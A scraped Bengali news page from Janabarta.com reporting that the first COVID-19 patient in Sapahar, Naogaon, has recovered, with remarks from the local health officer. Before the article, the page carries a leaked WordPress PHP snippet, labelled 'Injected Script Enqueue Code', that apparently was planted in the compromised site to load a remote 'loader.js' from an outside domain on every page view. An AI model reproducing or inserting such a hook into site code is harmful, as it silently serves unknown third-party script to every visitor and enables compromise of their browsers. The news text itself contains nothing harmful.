// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site সাপাহারে প্রথম করোনা আক্রান্ত খাইরুল সুস্থ্য, এলাকায় স্বস্তি - Janabarta.com

সাপাহারে প্রথম করোনা আক্রান্ত খাইরুল সুস্থ্য, এলাকায় স্বস্তি

সাপাহার (নওগাঁ) প্রতিনিধি: নওগাঁর সাপাহার উপজেলার প্রথম করোনা ভাইরাসে আক্রান্ত ব্যক্তি খাইরুল ইসলাম সম্পূর্ণ সুস্থ্য হয়ে বাড়ি ফিরেছেন।সুস্থতার জন্য তিনিসৃষ্টিকর্তা কে কৃতজ্ঞতা এবং সার্বিক সহযোগীতার জন্য উপজেলা স্বাস্থ্য বিভাগ ও উপজেলা প্রশাসন কে ধন্যবাদ জানান।

এদিকে তার সুস্থ্যতার খবরে আত্নীয় স্বজন ও এলাকাবাসীর মধ্যে বইছে আনন্দের বন্যা। জানা গেছে, গত ২৮ এপ্রিল উপজেলার গোয়ালা ইউনিয়নের কামাশপুর গ্রামের পল্লী চিকিৎসক খাইরুল ইসলামের শরীরে করোনা ভাইরাস শনাক্ত হয়। এরপর থেকে সাপাহার উপজেলা প্রশাসন ও স্বাস্থ্য বিভাগের দিক নির্দেশনায় খাইরুল ইসলাম করোনা ভাইরাস রোগ সংক্রান্ত সমস্ত নিয়ম কানুন মেনে চলেছেন। এমনকি সাপাহার, নওগাঁ এবং রাজশাহী মেডিকেল কলেজের আইসিইউ তে থাকাকালীন সময়েও তাঁর মানসিক দৃঢ়তা ছিল অত্যন্ত আশাবাদি  এবং সে করোনা ভাইরাস প্রতিরোধে সকল নিয়ম কানুন মেনে চলায় আজ ১০ মে তিনি সুস্থ্য হয়ে বাড়ি ফিরেছেন।

সাপাহার উপজেলা স্বাস্থ্য ও পরিবার পরিকল্পনা অফিসার ডা: মুহা: রুহুল আমিন জানান, প্রথম আক্রান্ত খাইরুল ইসলাম করোনা ভাইরাসে যুদ্ধজয়ী হয়ে বাড়ি ফিরে যেতে পারল। রাজশাহী ল্যাবে আবার তার নমুনা সংগ্রহ করে পরীক্ষা করা হয়েছে এতে তার ফলাফল নেগেটিভ আসে। তিনি এখন সম্পূর্ণ সুস্থ্য। নিয়মানুযায়ী তিনি বাড়িতে আবার ১৪ দিনের হোম কোয়ারেন্টাইনে থাকবেন বলেও ডা: রুহুল আমিন জানান।